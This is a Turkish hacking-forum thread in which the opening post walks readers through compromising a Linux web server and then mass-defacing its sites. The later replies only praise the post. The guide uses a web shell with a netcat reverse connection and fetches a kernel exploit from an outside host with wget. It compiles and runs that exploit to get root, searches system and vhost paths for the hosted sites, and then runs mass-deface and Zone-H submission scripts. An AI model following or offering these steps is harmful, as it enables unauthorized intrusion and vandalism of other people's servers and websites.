Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Linux Server Root kullanımı
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 121
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Linux Server Root kullanımı
08.01.2014 15:55
1) netcat (for back connect)
2) r57 yada c99 shell (Back connect opsinoyu bazı c99larda da mevcuttur)
3)mass.pl (çoklu deface için indexleyicidir)
4)zone-h.pl (çoklu deface kaydı içindir)
5) special bir index


Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz
karşımıza siyah ms-dos ekranı gelecek bu ekrana

nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım
Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir
açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz)
evet ornek olarak r57 shellimizde de back connect yerine 443 yazıyoruz








shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandıkmı bakalım



evet baglandık serverimiz 2007 sürümü 2.6.22

exploitimizi googledan veya milw0rm türü sitelerden dan arayıp bulduktan sonra

serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home1/corppmco/public_html/tmp dizinindedir
ikinci verdiğim joomla sitelerdedir.

wget komutuyla exploiti server upload edelim ornek olarak
wget http://xxx.com/2.6.22.c
exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı
not: bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur.
attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)
gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)

chmod ayarı yapacagız
chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra
./root diyerek exploitimizi çağırıyoruz (alttaki resimde oldugu gibi)




bazen hemen bazen bi süre bekledikten sonra cevap gelir sabırlı olun
id komutuyla kontrol edelim




evet serverimiz rootlandı
whoami komutuylada bu görüyoruz (verdiğimiz isim çıkmalıdır)
uid=0 ı gorduk
şimdi musait bi yere indeximizi ve mass.pl yi atalım
serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
bu komutlar :

/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/

/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/
gibi
bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra
ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz



siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
kayıt ettikten sonra dos ekranında mass deface işlemine gecelim





önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
mass deface biraz zaman alabilir sabırlı olmak gerek
işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz

cd..
cd..
cd perl
cd bin
perl zoneh.pl hack.txt Kam_06 (nickimi yazdım) yazıp enter diyoruz





alintıdır :Samet Kardeşim Yani Ka_06 Kardeşimenin Eline saglık O Bana Ögretti hackı Smile


Alinti
Trafalgar Law
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 6
Yaşam Puanı: 4 / 138
Deneyim: 55 / 100
Rep Sayısı: 1
Mesaj Sayısı: 59
Üyelik Tarihi: 04.01.2014
     
Yorum: #2
Cvp: Linux Server Root kullanımı
08.01.2014 17:08
Eline sağlık.

Kovaladığımız hayaller ve bizi kovalayan gerçekler her zaman paralel; asla kesişmiyorlar.
Alinti
malware
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 3
Yaşam Puanı: 0 / 52
Deneyim: 9 / 100
Rep Sayısı: 0
Mesaj Sayısı: 19
Üyelik Tarihi: 09.08.2014
     
Yorum: #3
Cvp: Linux Server Root kullanımı
10.08.2014 11:07
Eline Saglik Cok Guzel Paylasim Tebrikler
Alinti
Mr.3xT
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 11
Yaşam Puanı: 22 / 254
Deneyim: 18 / 100
Rep Sayısı: 10
Mesaj Sayısı: 147
Üyelik Tarihi: 26.07.2014
     
Yorum: #4
Cvp: Linux Server Root kullanımı
17.08.2014 23:33
eline saglık cok güzel .
Alinti
DeadLiner
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 18 / 237
Deneyim: 49 / 100
Rep Sayısı: 6
Mesaj Sayısı: 131
Üyelik Tarihi: 02.08.2014
     
Yorum: #5
Cvp: Linux Server Root kullanımı
18.08.2014 12:37
Anlatım için teşekkürler sağolasın Exciting
Alinti



1 Ziyaretçi